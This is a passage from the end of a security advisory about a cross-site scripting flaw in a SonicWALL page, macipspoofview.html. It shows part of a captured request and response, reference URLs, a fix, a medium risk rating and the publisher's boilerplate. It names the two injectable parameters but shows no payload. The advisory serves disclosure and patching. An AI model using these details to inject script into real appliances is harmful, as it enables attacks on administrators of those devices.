s_sv_sid=75828994935; s_sv_112_p1=1@11@s/15062&e/2; s_sv_112_s1=1@16@a//1416865504579; curUrl=macIpSpoofView.html; curUsr=; 77177=local; 1008=2; 1021=600; 1023=10; 1024=5; 1031=0; 1032=0; 1033=0; 1034=0; 1035=0; 1040=4; 1041=1; 1042=0; 1043=0; 1044=0; 1045=0; 1007=applFolder; 1022=true; SessId=null; PageSeed=null; tabbedWinAlert=done; 1004=1; 1000=9; 777=1]
      Connection[keep-alive]
   Response Header:
      Server[SonicWALL]
      Expires[-1]
      Cache-Control[no-cache]
      Content-Type[text/html;charset=UTF-8]


Reference(s):
https://cas.127.0.0.1:8080/
https://cas.127.0.0.1:8080/macIpSpoofView.html
https://cas.127.0.0.1:8080/macIpSpoofView.html?mainFrameYAxis=0&startItem=0&startItemIpDet=0


Solution - Fix & Patch:
=======================
The vulnerability can be patched by a secure parse and encode of the vulnerable searchSpoof and searchSpoofIpDet parameters.
Restrict the input of the values and encode the output context of the macipspoofview.html to prevent client-side or application-side script code injection attacks.


Security Risk:
==============
The security risk of the cross site scripting web vulnerability in the macipspoofview.html file is estimated as medium. (CVSS 3.0)


Credits & Authors:
==================
Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@evolution-sec.com) [www.vulnerability-lab.com]


Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed 
or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable 
in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab 
or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for 
consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses, 
policies, deface websites, hack into databases or trade with fraud/stolen material.

Domains:    www.vulnerability-lab.com    - www.vuln-lab.com            - www.evolution-sec.com
Contact:    admin@vulnerability-lab.com  - research@vulnerability-lab.com           - admin@evolution-sec.com
Section:    magazine.vulnerability-db.com - vulnerability-lab.com/contact.php          - evolution-sec.com/contact
Social:     twitter.com/#!/vuln_lab   - facebook.com/VulnerabilityLab           - youtube.com/user/vulnerability0lab
Feeds:     vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php     - vulnerability-lab.com/rss/rss_news.php
Programs:   vulnerability-lab.com/submit.php   - vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register/

Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to 
electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by 
Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website 
is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact 
(admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission.

    Copyright © 2015 | Vulnerability Laboratory - [Evolution Security GmbH]™